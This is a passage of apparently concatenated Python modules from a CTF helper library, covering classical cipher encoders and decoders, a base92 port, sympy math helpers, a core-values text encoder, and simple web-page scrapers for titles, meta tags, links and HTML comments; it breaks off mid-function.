import re


def js_from_file(file_name):
    # 读文件
    with open(file_name, 'r', encoding='UTF-8') as file:
        result = file.read()
        return result


def read_file_to_list(file_name):
    # 读入文件，并以换行符分割
    lines = []
    with open(file_name, 'r') as f:
        for line in f:
            lines.append(line.strip())
    return lines


def is_http_or_https_url(url):
    # 检测是否是http或https地址
    pattern = r'^https?:\/\/'
    return re.match(pattern, url) is not None


def normalize_url(url):
    # 去掉末尾的/
    return url.rstrip('/')


import json


def caesar_encrypt(text, shift):
    # 凯撒加密 （重新写的）
    ciphertext, shift = '', int(shift)
    for p in text:
        if p.islower():
            ciphertext += chr(97 + (ord(p) - 97 + shift) % 26)
        elif p.isupper():
            ciphertext += chr(65 + (ord(p) - 65 + shift) % 26)
        else:
            ciphertext += p
    return ciphertext


def caesar_decrypt(text, shift):
    shift = int(shift)
    return caesar_encrypt(text, -shift)


def caesar_decrypt_cracking(ciphertext):
    # 凯撒解密爆破，返回值为json
    results = {}
    for i in range(1, 26):
        results[str(i)] = caesar_decrypt(ciphertext, i)
    return json.dumps(results)


def caesar_encrypt_cracking(ciphertext):
    # 凯撒加密爆破，返回值为json
    results = {}
    for i in range(1, 26):
        results[str(i)] = caesar_encrypt(ciphertext, i)
    return json.dumps(results)


def bacon_encrypt(string):
    # 培根密码加密
    bacon = {'A': 'AAAAA', 'B': 'AAAAB', 'C': 'AAABA', 'D': 'AAABB',
             'E': 'AABAA', 'F': 'AABAB', 'G': 'AABBA', 'H': 'AABBB',
             'I': 'ABAAA', 'J': 'ABAAB', 'K': 'ABABA', 'L': 'ABABB',
             'M': 'ABBAA', 'N': 'ABBAB', 'O': 'ABBBA', 'P': 'ABBBB',
             'Q': 'BAAAA', 'R': 'BAAAB', 'S': 'BAABA', 'T': 'BAABB',
             'U': 'BABAA', 'V': 'BABAB', 'W': 'BABBA', 'X': 'BABBB',
             'Y': 'BBAAA', 'Z': 'BBAAB', 'a': 'AAAAA', 'b': 'AAAAB',
             'c': 'AAABA', 'd': 'AAABB', 'e': 'AABAA', 'f': 'AABAB',
             'g': 'AABBA', 'h': 'AABBB', 'i': 'ABAAA', 'j': 'ABAAB',
             'k': 'ABABA', 'l': 'ABABB', 'm': 'ABBAA', 'n': 'ABBAB',
             'o': 'ABBBA', 'p': 'ABBBB', 'q': 'BAAAA', 'r': 'BAAAB',
             's': 'BAABA', 't': 'BAABB', 'u': 'BABAA', 'v': 'BABAB',
             'w': 'BABBA', 'x': 'BABBB', 'y': 'BBAAA', 'z': 'BBAAB'}
    encoded_string = ''
    for char in string:
        char = char.upper()
        if char in bacon:
            encoded_string += bacon[char]
    return encoded_string


def bacon_decrypt(string):
    bacon = {'AAAAA': 'A', 'AAAAB': 'B', 'AAABA': 'C', 'AAABB': 'D',
             'AABAA': 'E', 'AABAB': 'F', 'AABBA': 'G', 'AABBB': 'H',
             'ABAAA': 'I', 'ABAAB': 'J', 'ABABA': 'K', 'ABABB': 'L',
             'ABBAA': 'M', 'ABBAB': 'N', 'ABBBA': 'O', 'ABBBB': 'P',
             'BAAAA': 'Q', 'BAAAB': 'R', 'BAABA': 'S', 'BAABB': 'T',
             'BABAA': 'U', 'BABAB': 'V', 'BABBA': 'W', 'BABBB': 'X',
             'BBAAA': 'Y', 'BBAAB': 'Z'}
    decoded_string = ''
    for i in range(0, len(string), 5):
        chunk = string[i:i + 5]
        if chunk in bacon:
            decoded_string += bacon[chunk]
    return decoded_string


def rot13(text):
    # ROT13 加密即解密
    # 还有一种写法是 凯撒，偏移量13
    mapping = {
        'A': 'N', 'B': 'O', 'C': 'P', 'D': 'Q', 'E': 'R',
        'F': 'S', 'G': 'T', 'H': 'U', 'I': 'V', 'J': 'W',
        'K': 'X', 'L': 'Y', 'M': 'Z', 'N': 'A', 'O': 'B',
        'P': 'C', 'Q': 'D', 'R': 'E', 'S': 'F', 'T': 'G',
        'U': 'H', 'V': 'I', 'W': 'J', 'X': 'K', 'Y': 'L',
        'Z': 'M'
    }
    # 加/解密文本
    encrypted_text = ''
    for char in text:
        if char.upper() in mapping:
            if char.isupper():
                encrypted_text += mapping[char]
            else:
                encrypted_text += mapping[char.upper()].lower()
        else:
            encrypted_text += char

    return encrypted_text


def rot5(text):
    # ROT5 加密即解密
    mapping = {
        '0': '5', '1': '6', '2': '7', '3': '8', '4': '9',
        '5': '0', '6': '1', '7': '2', '8': '3', '9': '4',
    }
    # 加/解密文本
    encrypted_text = ''
    for char in text:
        if char in mapping:
            encrypted_text += mapping[char]
        else:
            encrypted_text += char

    return encrypted_text


def rot18(text):
    # ROT18 加密即解密
    mapping = {
        '0': '5', '1': '6', '2': '7', '3': '8', '4': '9',
        '5': '0', '6': '1', '7': '2', '8': '3', '9': '4',
        'A': 'N', 'B': 'O', 'C': 'P', 'D': 'Q', 'E': 'R',
        'F': 'S', 'G': 'T', 'H': 'U', 'I': 'V', 'J': 'W',
        'K': 'X', 'L': 'Y', 'M': 'Z', 'N': 'A', 'O': 'B',
        'P': 'C', 'Q': 'D', 'R': 'E', 'S': 'F', 'T': 'G',
        'U': 'H', 'V': 'I', 'W': 'J', 'X': 'K', 'Y': 'L',
        'Z': 'M'
    }
    # 加/解密文本
    encrypted_text = ''
    for char in text:
        if char.upper() in mapping:
            if char.isupper():
                encrypted_text += mapping[char]
            else:
                encrypted_text += mapping[char.upper()].lower()
        else:
            encrypted_text += char

    return encrypted_text


def eight_diagrams_encrypt(text):
    # 八卦加密 仅支持ASCII码支持的字符
    codelist = []
    fuxi = ['坤', '震', '坎', '兑', '艮', '离', '巽', '乾']
    strlist = text
    for character in strlist:
        if len(bin(ord(character)).replace('0b', '')) == 7:
            codelist.append(str(bin(ord(character)).replace('0b', '')))
        else:
            codelist.append('0' + str(bin(ord(character)).replace('0b', '')))
    r = ''
    for code in codelist:
        code3 = []
        code2 = list(code)
        if code2[0] == '0':
            cncode0 = '逆'
        else:
            cncode0 = '正'
        cncode1 = str(fuxi[int(str(code2[1] + code2[2] + code2[3]), 2)])
        cncode2 = str(fuxi[int(str(code2[4] + code2[5] + code2[6]), 2)])
        cncode = cncode0 + cncode1 + cncode2
        r += cncode + "~"
    return r

def eight_diagrams_decrypt(text):
    fuxi = ['坤', '震', '坎', '兑', '艮', '离', '巽', '乾']
    string = text
    cncodelist = string.split('~')
    del cncodelist[-1]
    r = ''
    for cncode in cncodelist:
        cncodesplit = list(cncode)
        if cncodesplit[0] == '逆':
            code1 = '0'
        else:
            code1 = '1'
        if len(str(bin(fuxi.index(cncodesplit[1])).replace('0b', ''))) == 3:
            code2 = str(bin(fuxi.index(cncodesplit[1])).replace('0b', ''))
        elif len(str(bin(fuxi.index(cncodesplit[1])).replace('0b', ''))) == 2:
            code2 = '0' + str(bin(fuxi.index(cncodesplit[1])).replace('0b', ''))
        else:
            code2 = '00' + str(bin(fuxi.index(cncodesplit[1])).replace('0b', ''))
        if len(str(bin(fuxi.index(cncodesplit[2])).replace('0b', ''))) == 3:
            code3 = str(bin(fuxi.index(cncodesplit[2])).replace('0b', ''))
        elif len(str(bin(fuxi.index(cncodesplit[2])).replace('0b', ''))) == 2:
            code3 = '0' + str(bin(fuxi.index(cncodesplit[2])).replace('0b', ''))
        else:
            code3 = '00' + str(bin(fuxi.index(cncodesplit[2])).replace('0b', ''))
        code = code1 + code2 + code3
        character = chr(int(code, 2))
        r += character
    return r


def atbash_cipher(text):
    # 建立映射关系 解密=加密
    mapping = {chr(i): chr(ord('A') + ord('Z') - i) for i in range(ord('A'), ord('Z') + 1)}
    mapping.update({chr(i): chr(ord('a') + ord('z') - i) for i in range(ord('a'), ord('z') + 1)})

    # 加密
    encrypted_text = ''.join(mapping[c] if c.isalpha() else c for c in text)
    return encrypted_text


def morse_encrypt(message, split=" ", point='.', bar='-'):
    """
    :param message: 加密内容
    :param split: 分隔符
    :param point: 点
    :param bar: 横杠
    :return:
    """
    # 字符映射表
    morse_code_dict = {
        'A': '.-', 'B': '-...', 'C': '-.-.',
        'D': '-..', 'E': '.', 'F': '..-.',
        'G': '--.', 'H': '....', 'I': '..',
        'J': '.---', 'K': '-.-', 'L': '.-..',
        'M': '--', 'N': '-.', 'O': '---',
        'P': '.--.', 'Q': '--.-', 'R': '.-.',
        'S': '...', 'T': '-', 'U': '..-',
        'V': '...-', 'W': '.--', 'X': '-..-',
        'Y': '-.--', 'Z': '--..', '1': '.----',
        '2': '..---', '3': '...--', '4': '....-',
        '5': '.....', '6': '-....', '7': '--...',
        '8': '---..', '9': '----.', '0': '-----',
        ', ': '--..--', '.': '.-.-.-', '?': '..--..',
        '/': '-..-.', '-': '-....-', '(': '-.--.', ')': '-.--.-',
        ' ': ' ', '{': '----.--', '}': '-----.-', ':': '---...'
    }
    cipher = ''
    for letter in message.upper():
        if letter in morse_code_dict:  # 对映射表没有的东进行跳过
            if letter != ' ':
                string = morse_code_dict[letter]
                new_string = ""
                for ch in string:
                    if ch == ".":
                        new_string += point
                    elif ch == "-":
                        new_string += bar
                cipher += new_string + split
            else:
                cipher += ' '
        else:
            cipher += ''
    return cipher[:-1]


def morse_decrypt(cipher, split=" ", point='.', bar='-'):
    """
    :param cipher: 解密内容
    :param split: 分隔符
    :param point: 点
    :param bar: 横杠
    :return:
    """
    morse_code_dict = {
        'A': '.-', 'B': '-...', 'C': '-.-.',
        'D': '-..', 'E': '.', 'F': '..-.',
        'G': '--.', 'H': '....', 'I': '..',
        'J': '.---', 'K': '-.-', 'L': '.-..',
        'M': '--', 'N': '-.', 'O': '---',
        'P': '.--.', 'Q': '--.-', 'R': '.-.',
        'S': '...', 'T': '-', 'U': '..-',
        'V': '...-', 'W': '.--', 'X': '-..-',
        'Y': '-.--', 'Z': '--..', '1': '.----',
        '2': '..---', '3': '...--', '4': '....-',
        '5': '.....', '6': '-....', '7': '--...',
        '8': '---..', '9': '----.', '0': '-----',
        ', ': '--..--', '.': '.-.-.-', '?': '..--..',
        '/': '-..-.', '-': '-....-', '(': '-.--.', ')': '-.--.-',
        ' ': ' ', '{': '----.--', '}': '-----.-', ':': '---...'
    }
    inverted_dict = {v: k for k, v in morse_code_dict.items()}
    # 初始化解密后的字符串
    message = ''
    # 遍历每个摩尔斯码，并根据映射表解码
    for code in cipher.split(split):
        string = code
        new_string = ""
        for ch in string:
            if ch == point:
                new_string += '.'
            elif ch == bar:
                new_string += '-'
        message += inverted_dict[new_string]

    return message


# def qsnctf_decrypt(text):
#     # 修改版的ROT5，只替换映射表
#     mapping = {
#         '青': '5', '少': '6', '年': '7', 'C': '8', 'T': '9',
#         'F': '0', '训': '1', '练': '2', '平': '3', '台': '4',
#     }
#     # 加/解密文本
#     encrypted_text = ''
#     for char in text:
#         if char in mapping:
#             encrypted_text += mapping[char]
#         else:
#             encrypted_text += char
#
#     return encrypted_text
#
#
#
#     return encrypted_text

# def vigenere_encrypt(text,key):
#     return vigenere.encrypt(text, key, base64=False)
#
#
# def vigenere_decrypt(text,key):
#     return vigenere.decrypt(text, key)




# THE BEERWARE LICENSE (Revision 42):
# <thenoviceoof> wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you
# think this stuff is worth it, you can buy me a beer in return
# - Nathan Hwang (thenoviceoof)

# 起因：CTF及一些问题中需要用到base92做加解码，苦于未找到python3版本，因此基于python2版本做代码兼容，仅做学习交流，请支持原作者
# 增加：支持python3
# 在原作者的基础上修改部分代码使其支持python3的运行
# 已知BUG：部分不可见字符及中文无法通过样例，暂时无做进一步修正打算，因为base92使用场景中大多数情况可以满足
# 如果有更好提议欢迎提出
# By Gu-f

'''
base92: a library for encoding byte strings

>>> x = encode('hello world')
>>> x
'Fc_$aOTdKnsM*k'
>>> decode(x)
'hello world'

>>> y = encode('^\xb6;\xbb\xe0\x1e\xee\xd0\x93\xcb"\xbb\x8fZ\xcd\xc3')
>>> y
"C=i.w6'IvB/viUpRAwco"
>>> decode(y)
'^\\xb6;\\xbb\\xe0\\x1e\\xee\\xd0\\x93\\xcb"\\xbb\\x8fZ\\xcd\\xc3'

this is a regression test
>>> decode(encode('aoeuaoeuaoeu'))
'aoeuaoeuaoeu'
'''

import math

__version__ = (1, 0, '3-1')


def base92_chr(val):
    '''
    Map an integer value <91 to a char

    >>> base92_chr(0)
    '!'
    >>> base92_chr(1)
    '#'
    >>> base92_chr(61)
    '_'
    >>> base92_chr(62)
    'a'
    >>> base92_chr(90)
    '}'
    >>> base92_chr(91)
    Traceback (most recent call last):
        ...
    ValueError: val must be in [0, 91)
    '''
    if val < 0 or val >= 91:
        raise ValueError('val must be in [0, 91)')
    if val == 0:
        return '!'
    elif val <= 61:
        return chr(ord('#') + val - 1)
    else:
        return chr(ord('a') + val - 62)


def base92_ord(val):
    '''
    Map a char to an integer

    >>> base92_ord('!')
    0
    >>> base92_ord('#')
    1
    >>> base92_ord('_')
    61
    >>> base92_ord('a')
    62
    >>> base92_ord('}')
    90
    >>> base92_ord(' ')
    Traceback (most recent call last):
        ...
    ValueError: val is not a base92 character
    '''
    num = ord(val)
    if val == '!':
        return 0
    elif ord('#') <= num and num <= ord('_'):
        return num - ord('#') + 1
    elif ord('a') <= num and num <= ord('}'):
        return num - ord('a') + 62
    else:
        raise ValueError('val is not a base92 character')


def base92_encode(bytstr):
    '''
    Take a byte-string, and encode it in base 91

    >>> base92_encode("")
    '~'
    >>> base92_encode("\\x00")
    '!!'
    >>> base92_encode("\x01")
    '!B'
    >>> base92_encode("\xff")
    '|_'
    >>> base92_encode("aa")
    'D8*'
    >>> base92_encode("aaaaaaaaaaaaa")
    'D81RPya.)hgNA(%s'
    >>> base92_encode([16,32,48])
    "'_$,"
    '''
    # always encode *something*, in case we need to avoid empty strings
    if not bytstr:
        return '~'
    # make sure we have a bytstr
    # if (not isinstance(bytstr, str)) or (not isinstance(bytstr, bytes)):
    if not isinstance(bytstr, str):
        # we'll assume it's a sequence of ints
        bytstr = ''.join([chr(b) for b in bytstr])
    # prime the pump
    bitstr = ''
    while len(bitstr) < 13 and bytstr:
        bitstr += '{:08b}'.format(ord(bytstr[0]))
        bytstr = bytstr[1:]
    resstr = ''
    while len(bitstr) > 13 or bytstr:
        i = int(bitstr[:13], 2)
        resstr += base92_chr(i // 91)
        resstr += base92_chr(i % 91)
        bitstr = bitstr[13:]
        while len(bitstr) < 13 and bytstr:
            bitstr += '{:08b}'.format(ord(bytstr[0]))
            bytstr = bytstr[1:]
    if bitstr:
        if len(bitstr) < 7:
            bitstr += '0' * (6 - len(bitstr))
            resstr += base92_chr(int(bitstr, 2))
        else:
            bitstr += '0' * (13 - len(bitstr))
            i = int(bitstr, 2)
            resstr += base92_chr(i // 91)
            resstr += base92_chr(i % 91)
    return resstr.replace('\\', '\\\\')


def base92_decode(bstr):
    '''
    Take a base92 encoded string, convert it back to a byte-string

    >>> base92_decode("")
    ''
    >>> base92_decode("~")
    ''
    >>> base92_decode("!!")
    '\\x00'
    >>> base92_decode("!B")
    '\\x01'
    >>> base92_decode("|_")
    '\\xff'
    >>> base92_decode("D8*")
    'aa'
    >>> base92_decode("D81RPya.)hgNA(%s")
    'aaaaaaaaaaaaa'
    '''
    bitstr = ''
    resstr = ''
    if bstr == '~':
        return ''
    # we always have pairs of characters
    for i in range(len(bstr) // 2):
        x = base92_ord(bstr[2 * i]) * 91 + base92_ord(bstr[2 * i + 1])
        bitstr += '{:013b}'.format(x)
        while 8 <= len(bitstr):
            resstr += chr(int(bitstr[0:8], 2))
            bitstr = bitstr[8:]
    # if we have an extra char, check for extras
    if len(bstr) % 2 == 1:
        x = base92_ord(bstr[-1])
        bitstr += '{:06b}'.format(x)
        while 8 <= len(bitstr):
            resstr += chr(int(bitstr[0:8], 2))
            bitstr = bitstr[8:]
    return resstr


encode = base92_encode
b92encode = base92_encode

decode = base92_decode
b92decode = base92_decode

##该样例通过率100%
if __name__ == '__main__':
    import random

    sum = 0
    for i in range(10000):
        randoms = random.randint(0, 92)
        strs = ''.join(random.sample(
            [' ', '!', '#', '$', '%', '&', '\'', '(', ')', '*', '+', ',', '-', '.', '/', '0', '1', '2', '3', '4', '5',
             '6', '7', '8', '9', ':', ';', '<', '=', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',
             'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^', '_',
             'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
             'v', 'w', 'x', 'y', 'z', '{', '|', '}'], randoms))
        # print(type(strs))
        result = encode(strs)
        # print(result)
        result2 = base92_decode(result.replace('\\\\', '\\'))
        # print(result2)
        if strs == result2:
            # print("pass")
            sum += 1
    print("testNum:10000, pass:" + str(sum))

##该样例通过率约为8%
# if __name__ == "__main__":
#    import doctest
#    doctest.testmod()
#
#    ## more correctness tests
#    import hashlib
#    import random
#    def gen_bytes(s):
#        return hashlib.sha512(s).digest()[:random.randint(1,64)]
#    sum=0
#    for i in range(10000):
#        s = gen_bytes(str(random.random()).encode())
#        if type(s)==type(b'aa'):
#            result=encode(s)
#            #print(result)
#            result2=base92_decode(result.replace('\\\\','\\'))
#            #print(result2)
#            if s!=result2.encode():
#                #print("error")
#                sum+=1
#        else:
#            result=encode(s)
#            #print(result)
#            result2=base92_decode(result.replace('\\\\','\\'))
#            #print(result2)
#            if s!=result2:
#                #print("error")
#                sum+=1
#    print(sum)



import sympy  # 解方程需要


def gcd(a, b):
    """
    求最大公约数
    """
    while b:
        a, b = b, a % b
    return a


def lcm(a, b):
    """
    求最小公倍数
    """
    return a * b // gcd(a, b)


def Solving_equations1(eq_str):
    """
    解方程，需要用Python的数学方式传入方程表达式
    注意：需要用x设置未知数
    """
    x = sympy.symbols('x')
    lhs_str, rhs_str = eq_str.split("=")
    lhs_expr = sympy.sympify(lhs_str.strip())
    rhs_expr = sympy.sympify(rhs_str.strip())
    eq = sympy.Eq(lhs_expr, rhs_expr)
    solution = sympy.solve(eq, sympy.Symbol('x'))
    return solution[0]


def Solving_equations2(eq_str1, eq_str2):
    """
    解方程，需要用Python的数学方式传入方程表达式(两个方程组，也就是二元一次)
    注意：需要用x和y设置未知数
    """
    x, y = sympy.symbols('x y')
    lhs_str1, rhs_str1 = eq_str1.split("=")
    lhs_str2, rhs_str2 = eq_str2.split("=")
    lhs_expr1 = sympy.sympify(lhs_str1.strip())
    rhs_expr1 = sympy.sympify(rhs_str1.strip())
    lhs_expr2 = sympy.sympify(lhs_str2.strip())
    rhs_expr2 = sympy.sympify(rhs_str2.strip())
    eq1 = sympy.Eq(lhs_expr1, rhs_expr1)
    eq2 = sympy.Eq(lhs_expr2, rhs_expr2)
    solution = sympy.solve((eq1, eq2), (x, y))
    # Print the solution
    return solution


def calculate_discounted_value(future_value, growth_rate):
    """
    基期计算 基期量=现期量/（1+增长率）
    """
    current_value = future_value / (1 + growth_rate)
    return current_value


def differential_sequence_ask_n_value(a1, d, n):
    """
    求等差数列第n项
    """
    an = a1 + (n - 1) * d
    return {an}


def differential_sequence_ask_n_sum(a1, d, n):
    """
    求等差数列n项和
    """
    an = a1 + (n - 1) * d
    Sn = n / 2 * (a1 + an)
    return Sn


import re
import random
import argparse
from urllib.parse import quote, unquote

VALUES = '富强民主文明和谐自由平等公正法治爱国敬业诚信友善'


def str2utf8(s: str) -> str:
    pattern = re.compile(r'[A-Za-z0-9\-_.!~*\'()]')

    def replace(match):
        return f'{ord(match.group()):02X}'

    encoded = pattern.sub(replace, s)
    return quote(encoded, safe='').upper().replace('%', '')


def utf82str(hex_str: str) -> str:
    if len(hex_str) % 2 != 0:
        raise ValueError('Invalid hex length')

    percent_encoded = '%'.join([hex_str[i:i + 2] for i in range(0, len(hex_str), 2)])
    return unquote(f'%{percent_encoded}')


def hex2duo(hex_str: str) -> list:
    duo = []
    for c in hex_str:
        n = int(c, 16)
        if n < 10:
            duo.append(n)
        else:
            if random.choice([True, False]):
                duo.extend([10, n - 10])
            else:
                duo.extend([11, n - 6])
    return duo


def duo2hex(duo: list) -> str:
    hex_digits = []
    i = 0
    while i < len(duo):
        if duo[i] < 10:
            hex_digits.append(str(duo[i]))
            i += 1
        else:
            if duo[i] == 10:
                hex_digits.append(f'{duo[i + 1] + 10:X}')
            else:
                hex_digits.append(f'{duo[i + 1] + 6:X}')
            i += 2
    return ''.join(hex_digits)


def encode(text: str) -> str:
    hex_str = str2utf8(text)
    duo = hex2duo(hex_str)
    return ''.join([VALUES[2 * d] + VALUES[2 * d + 1] for d in duo])


def decode(encoded: str) -> str:
    duo = []
    for c in encoded:
        idx = VALUES.find(c)
        if idx != -1 and idx % 2 == 0:
            duo.append(idx // 2)
    hex_str = duo2hex(duo)
    return utf82str(hex_str)


def interactive_mode():
    modes = {
        '1': ('加密', encode),
        '2': ('解密', decode),
    }

    while True:
        print('\n=== 社会主义核心价值观编解码 ===')
        print('1. 加密\n2. 解密\n3. 退出')
        choice = input('请选择操作: ').strip()

        if choice == '3':
            break

        if choice not in modes:
            print('无效选择')
            continue

        mode_name, func = modes[choice]

        text = input(f'输入待{mode_name}文本: ')
        try:
            result = func(text)
            print(f'\n{mode_name}结果:\n{result}')
        except Exception as e:
            print(f'错误: {e}')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='社会主义核心价值观编解码工具')
    parser.add_argument('-m', '--mode', choices=['encode', 'decode'], help='编码或解码模式')
    parser.add_argument('-t', '--text', help='直接处理的文本')
    parser.add_argument('-o', '--output', help='输出文件路径')

    args = parser.parse_args()

    if args.text:
        try:
            if args.mode == 'encode':
                result = encode(args.text)
            elif args.mode == 'decode':
                result = decode(args.text)
            else:
                raise ValueError('请指定模式参数 --mode')

            if args.output:
                with open(args.output, 'w', encoding='utf-8') as f:
                    f.write(result)
                print(f'结果已保存至 {args.output}')
            else:
                print(result)
        except Exception as e:
            print(f'处理错误: {e}')
    else:
        interactive_mode()


import requests
import base64
import urllib.parse


def send_get_json(url, proxy=""):
    if proxy == "":
        return requests.get(url).json()
    else:
        proxies = {
            'http': f'http://{proxy}',
            'https': f'http://{proxy}'
        }
        return requests.get(url, proxies=proxies).json()


def get_base64(text):
    return base64.b64encode(text.encode()).decode()


def get_base64_url(text):
    return urllib.parse.quote(base64.b64encode(text.encode()).decode())


# web操作
import os
import re
import time
import queue
import threading
import requests
from bs4 import BeautifulSoup,Comment
from qsnctf.auxiliary import read_file_to_list, is_http_or_https_url, normalize_url


def get_url_title(url, cookies=''):
    """
    :param cookies: cookies
    :param url: get url
    :return:  url title
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        title = soup.find("title")
        title = re.search(r"<title>(.+?)</title>", str(title))
        if title:
            title = title.group(1)
        else:
            title = "No Title"
    else:
        title = "Request unreachable"
    return title


def get_url_description(url, cookies=''):
    """
    :param cookies: cookie
    :param url: get url
    :return:  url description
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        description_tag = soup.find('meta', attrs={'name': 'description'})
        if description_tag:
            description = description_tag['content']
        else:
            description = 'No description'
    else:
        description = "Request unreachable"
    return description


def get_url_keywords(url, cookies=''):
    """
    :param cookies: cookie
    :param url: get url
    :return:  url keywords
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        keywords_tag = soup.find('meta', attrs={'name': 'keywords'})
        if keywords_tag:
            keywords = keywords_tag['content']
        else:
            keywords = 'No keywords'
    else:
        keywords = "Request unreachable"
    return keywords


def get_url_ICP(url, cookies=""):
    """
    :param cookies: cookie
    :param url: get url
    :return:  url ICP
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        icp_tag = soup.find('a', attrs={'href': 'https://beian.miit.gov.cn'})
        if icp_tag:
            icp = icp_tag.text
        else:
            icp = 'No ICP'
    else:
        icp = "Request unreachable"
    return icp.lstrip()


def get_url_a_href(url, cookies=""):
    """
    :param cookies: cookie
    :param url: get url
    :return:  url a_href list
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    r_list = []
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        a_tags = soup.find_all('a')
        if a_tags:
            for a_tag in a_tags:
                # 取出 a 标签的 href 属性值
                href = a_tag.get('href')
                r_list.append(href)
            href = r_list
        else:
            href = 'No href'
    else:
        href = "Request unreachable"
    return href


def get_url_img(url, cookies=""):
    """
    :param cookies: cookie
    :param url: get url
    :return:  url img list
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    r_list = []
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        a_tags = soup.find_all('img')
        if a_tags:
            for a_tag in a_tags:
                # 取出 a 标签的 href 属性值
                src = a_tag.get('src')
                r_list.append(src)
            src = r_list
        else:
            src = 'No src'
    else:
        src = "Request unreachable"
    return src


def get_url_comment(url, cookies=""):
    """
    :param cookies: cookie
    :param url: get url
    :return:  url comment
    """
    browser = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0",
        "Accept": "*/*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded",
        "Referer": f"{url}", "Cookie": f"{cookies}",
        "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin",
        "Te": "trailers", "Connection": "close"}
    requests.packages.urllib3.disable_warnings()
    r_list = []
    response = requests.get(url, headers=browser, verify=False)
    if response.status_code == 200:
        soup = BeautifulSoup(response.text, "html.parser")
        # 查找所有的注释节点
        comments = soup.find_all(string=lambda s: isinstance(s, Comment))
        # 遍历注释节点
        if comments:
